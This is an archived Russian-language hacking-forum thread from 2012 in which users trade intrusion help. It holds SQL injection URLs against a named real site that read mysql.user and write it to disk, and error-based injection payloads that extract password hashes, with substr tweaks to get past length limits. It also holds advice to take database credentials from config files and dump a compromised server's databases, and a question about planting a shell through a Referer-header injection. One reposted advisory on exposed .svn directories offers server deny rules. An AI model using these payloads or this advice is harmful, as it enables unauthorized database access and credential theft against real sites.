ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.04.2012, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
1877
Репутация:
0
|
|
Выкачал папку phpmyadmin с сервера, в ней находятся все базы данных сайтов хостящихся на этом сервере?
|
|
|
|
15.04.2012, 01:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
http://twocomrades.ru/svn
Уязвимость SVN всех версий
Нами была найдена уязвимость SVN всех версий, с помощью которой можно получить исходные коды проекта.
Уязвимость имеет силу на проектах, исходные коды которого обновляются через SVN и вебсервер не запрещает читать скрытые директории. По умолчанию ни один вебсервер это не делает.
Степень угрозы: средняя/высокая
Архитектура SVN предусматривает хранение метаданных и версионную информацию файла для каждой директории исходных кодов. Данные находятся в метадиректории «.svn». Получив доступ к ней, можно как минимум построить файловое дерево проекта, узнать URL основного репозитория и список пользователей SVN, как максимум — получить доступ к исходным кодам проекта.
Исследование было произведено совместно с Антоном Исайкиным.
Способы защиты
Закрыв доступ на чтение из скрытых директорий на сервере, вы обезопасите себя от подобных уявимостей.
Nginx (лучший вебсервер всех времён и народов, кстати)
location ~ \.svn {
deny all;
}
Apache
Order allow,deny
Deny from all
Satisfy All
SVN
По возможности делать выгрузку исходникиов на продакшен-сервер посредством svn export.
Кто знает подробнее?
|
|
|
|
15.04.2012, 01:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
ReV0LVeR
http://habrahabr.ru/post/70330/
Сообщение от Chuvash
Chuvash said:
Выкачал папку phpmyadmin с сервера, в ней находятся все базы данных сайтов хостящихся на этом сервере?
Нет. PHPMyAdmin - лишь оболочка.
|
|
|
15.04.2012, 02:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+
что не так?
|
|
|
|
15.04.2012, 03:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
1877
Репутация:
0
|
|
Сообщение от Tigger
Tigger said:
ReV0LVeR
http://habrahabr.ru/post/70330/
Нет. PHPMyAdmin - лишь оболочка.
А где тогда лежат файлы баз данных? просто имеется доступ ко всему диску сервера....
|
|
|
|
15.04.2012, 03:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
Chuvash, ищи логин и пароль к бд в конфигурационных фаилах таких как *config, config.inc.php и т д , цепляйся к бд делай полный дамп.
|
|
|
|
15.04.2012, 15:08
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Chuvash
Chuvash said:
А где тогда лежат файлы баз данных? просто имеется доступ ко всему диску сервера....
Базы данных физически располагаются в директории указанной в конфигурации msyql сервера. Различия могут быть в зависимости как от дистрибутива, так и опционально указанные при компиляции либо измененные после установки. Смотри my.cnf
|
|
|
|
15.04.2012, 17:14
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Привет, есть вопрос.
Имею скуль типа
Код:
Code:
script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+password+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
Есть все основания полагать, что соленый хеш может быть больше 64 символов.
Вопрос- как получить остальные символы, т.к. выдает только первые 64? |
|
|
|
15.04.2012, 17:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от fl00der
fl00der said:
Привет, есть вопрос.
Имею скуль типа
Код:
Code:
script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+password+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
Есть все основания полагать, что соленый хеш может быть больше 64 символов.
Вопрос- как получить остальные символы, т.к. выдает только первые 64? несовсем тебя понял,
1)посмотри их в тругой таблице
2) если как я понял у тебя соль вместе с хешами и стоит ограничение на длину вывода то воспользуйся функцией substr
тут типа c 1-50 символов
Код:
Code:
script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+substr(password,1,50)+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
тут типа c 50-100 символов
Код:
Code:
script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+substr(password,50,100)+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
сори если опять туплю)
|
|
|
|
15.04.2012, 23:03
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
ребят,подскажите,пожалуйст а...
есть сайт на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен по-видимому...да и найти ошибку,которая фиксировалась бы в файле тоже оказалось сложно...однако,я её нашёл и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?
часть файла еррор.лог:
Код:
Code:
[15-Apr-2012 18:29:23] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"3000', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='1db420cb93a608c25c4c2990f164ea55'
[15-Apr-2012 19:19:05] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"0000 union select version() --', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='792bce446a531fd049eaa1b174c5ecba'
ошибка возникает в заголовке referer (ref) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
